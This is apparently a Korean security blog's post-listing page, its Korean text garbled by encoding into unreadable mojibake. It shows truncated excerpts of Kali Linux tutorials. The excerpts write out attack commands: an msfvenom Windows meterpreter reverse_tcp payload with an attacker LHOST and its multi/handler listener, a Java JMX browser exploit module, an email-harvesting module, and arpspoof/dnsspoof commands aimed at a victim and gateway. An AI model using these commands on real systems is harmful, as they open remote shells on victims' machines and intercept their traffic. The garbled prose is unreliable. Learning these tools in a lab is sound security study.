728x90 ๋ฐ์ํ kali linux7 netdiscover tutorial :) netdiscover ๊ฐ์ ๊ฒฝ์ฐ์๋ ๊ธฐ๋ณธ์ ์ผ๋ก backtrack 5 ๋ kali ์ ์๋ network tool์ด๋ค. netdiscover์ active / passive scanner์ด๋ค. ์ฌ์ฉ๋ฐฉ๋ฒ์ ํ๋ฒ ์์๋ณด์ . ๊ธฐ๋ณธ์ ์ผ๋ก netdiscover ๋ง ์ ๋ ฅํด๋ ์ด๋ ๊ฒ ๋จ๋ ๊ฒ์ ์์์๋ค. ์ข๋ ๊ตฌ์ฒด์ ์ผ๋ก ์ฌ์ฉํ๊ธฐ์ํด netdiscover -h ๋ฅผ ์ ๋ ฅํ๋ฉด ๋์๋ง์ด๋์ค๋๋ฐ -r ์ต์ ์ ์ด์ฉํ์ฌ ๋์ญ๋๋ฅผ ์ค์ ํด์ค์๋ ์๋ค. Security Study/Network 2016. 12. 26. Hack windows XP with armitage in kali ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ service postgresql start ๋ช ๋ น์ด๋ฅผ ์คํ์ํจ ํ service metasploit start ๋ฅผ ์คํํด์ค๋ค. ๋ค์์ armitage๋ฅผ ์คํ์ํจ๋ค. ์ด๋ฌํ ์ฐฝ์ ๋ณผ์์์ ํ ๋ฐ connect๋ฅผ ๋๋ฅด๊ณ yes๋ฅผ ๋๋ฅด๊ณ ๊ธฐ๋ค๋ฆฌ๋ฉด ์~~ ์~~~ ๊ธฐ๋ค๋ฆฌ๋ฉด ์ด๋ฌํ ์ฐฝ์ด ๋ฌ๋ค. tab์ฐฝ์์ hosts -> add hosts ๋ฅผ ๋๋ฅด๋ฉด ์ด๋ ๊ฒ victim IP๋ฅผ ์ ๋ ฅํ ์์๋๋ก ๋ฌ๋ค. ๋ฑ๋กํ OS ๋ฅผ ์์๋ณด์ ๋ค์ host ํญ์์ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ๊ณ yes ๊ทธ๋ผ ์ฝ์์ฐฝ์ ์ด๋ฌํ ๊ฒ์ ํ์ธํ ์ ์๋ค. ์ด์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๊ณต๊ฒฉํ๊ธฐ ์ํด ์ด๋ ํ.. Metasploit 2016. 12. 23. Kali Linux by pass - Hack Windows metasploit tutorial ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. ๋จผ์ service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์ํ๋ ํฌํธ] -f exe > filename.exe ๊ทธ๋ผ /root ํด๋์ exeํ์ผ์ด ์๊ธด๊ฒ์ ํ์ธํ ์ ์๋ค.๊ทธ๋ผ ๋ค์์ผ๋ก๋ ์ปจํธ๋กคํ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ค์ด๋ณด์. ๋จผ์ msfconsole์ ์ ๋ ฅํ๋ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์ฐ๋ฆฌ๊ฐ ํ์ผ์ ๋ง๋ค๋ ์ฌ์ฉํ payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22. Hack windows with metasploit Java Applet JMX Remote Code Execution ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ์ฐ๊ตฌ ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. ๋จผ์ ํ๊ธฐ์ ์ ๋ฆฌ๋ ์ค์์ service apache2 startservice postgresql startservice metastploit start ๋ช ๋ น์ด๋ค์ ์คํ ์์ผ์ค๋ค. ๊ทธ ํ msfconsole์ ํด์ค๋ค. ๊ทธ๋ผ ์์๊ฐ์ ์ฐฝ์ด ๋ฐ๊ฒ์ด๋ค. (๊ทธ๋ฆผ์ ๋ค๋ฅผ ์ ์๋ค.) ๊ทธ ํ ์ฐ๋ฆฌ๊ฐ ํด์ผํ ์ผ์ ํธ๋ค๋ฌ๋ฅผ ๋ง๋๋ ์ผ์ด๋ค.use exploit/multi/browser/java_jre17_jmxbean_2 ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํธ๋ค๋ฌ๋ฅผ ๋ง๋ ๋ค. ์ฐ๋ฆฌ๊ฐ ๋ค์ ํด์ผ ํ ํ๋์ผ๋ก show options ์ ์ด์ฉํ์ฌ ์ฐ๋ฆฌ๊ฐ ์ ํด์ค์ผํ๋ ๊ฒ์ ๋ณธ๋ค. ๋จผ์ URIPATH ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฒฝ๋ก๋ฅผ ์ง์ ํด์ค๋ค. / ํด๋๋๊ณ test๋ฅผ ํด๋๋๋ค. ์ง์ ํ์ง.. Metasploit 2016. 12. 22. kali linux 2.0 apt-get /etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free Metasploit/Kali & Backtrack 2015. 12. 10. msf ์ด์ฉํ๊ธฐ // beEF ์ฌ์ฉ๋ฒ msfconsole ์ ์ด์ฉํ์ฌ ๋ง์ ์ ๋ณด๋ฅผ ์ฐพ์ ์ ์๋ค.์์์ ๋ณด์ฌ์ค ์ ๋ณด๋ค ๋ฟ์๋๋ผ ์ด๋ฉ์ผ ์ฃผ์๊น์ง ์์๋ผ์ ์๋ค. ํ์ง๋ง msf ์์ฒด๋ ๋ฏธ๊ตญ์ ์ค์ ์ด ๋์ด ํ๊ตญ ์ ๋ณด๋ ๋ง์ด ์๋ค๋ ์ ์ด๋ค... (์ ์์ ์ธ ํ์์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.) 1. use auxiliary/gather/search_email_collector 2. set domain [๋๋ฉ์ธ] 3. run BeEFBeEF๋ Browser Exploit Framework ๋ก์จ ์ฌ์ฉ์ PC์ ์ ๋ณด ์์ง๋ถํฐ ๊ณต๊ฒฉ๊น์ง ๊ฐ๋ฅํ ๋๊ตฌ์ด๋ค. ์ฃผ๋ก xss(ํฌ๋ก์ค ์ฌ์ดํธ์คํฌ๋ฆฝํธ)๊ณต๊ฒฉ ์ทจ์ฝ์ ์ ์ฐพ๊ธฐ ์ํด ์ฌ์ฉ์ด๋๋ค. ๊ทธ๋ผ xss๋ ๋ฌด์์ผ๊น? ์ด๋ ์น์์ ์ฌ์ฉํ๋ ํด๋ผ์ด์ธํธ ์คํฌ๋ฆฝํธ๋ฅผ ํตํด ํน์ ํ ํ๋์ ์ผ์ผํค๋ ์ทจ์ฝ์ ์ ๋งํ๋ค. beEF ์ค์น!.. Metasploit 2015. 12. 6. Arp Spoofing & DNS Spoofing Arp Spoofing ๊ทผ๊ฑฐ๋ฆฌ ํต์ ๋ง์์ Arp ๋ฅผ ์ด์ฉํ์ฌ ์๋๋ฐฉ์ ๋ฐ์ดํฐ ํจํท์ ์ค๊ฐ์์ ๊ฐ๋ก์ฑ๋ ์ค๊ฐ์ ๊ณต๊ฒฉ์ ๋งํ๋ค. DNS Spoofing ๋๋ฉ์ธ ๋ค์ ์์คํ ์์ ์ ๋ฌ๋๋ IP ์ฃผ์๋ฅผ ๋ณ์กฐํ๊ฑฐ๋ ๋๋ฉ์ธ ๋ค์ ์์คํ ์ ์๋ฒ๋ฅผ ์ฅ์ ํ์ฌ ์ฌ์ฉ์๊ฐ ์๋ํ์ง ์์ ์ฃผ์๋ก ์ ์ํ๊ฒ ๋ง๋๋ ๊ณต๊ฒฉ์ด๋ค. ์ฃผ์!! ์ ์์ ์ผ๋ก ์ฌ์ฉํ๋ ์ฑ ์์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.. 1. service apache2 start ๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํจ์ผ๋ก apache2๋ฅผ ์คํ์ํจ๋ค. 2. arpspoof -i [interface] -t [victim IP] [gatewayIP] ์ด ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ arpspoofing์ ํ๋ค. 3. fragrouter -B1 ๋ช ๋ น์ด๋ฅผ ์ด์ฉํ์ฌ ํฌํธํฌ์๋ฉ์ ํ์ฌ ์ค๋ค. 4. dnsspoof -i [int.. Metasploit 2015. 12. 6. ์ด์ 1 ๋ค์ 728x90 ๋ฐ์ํ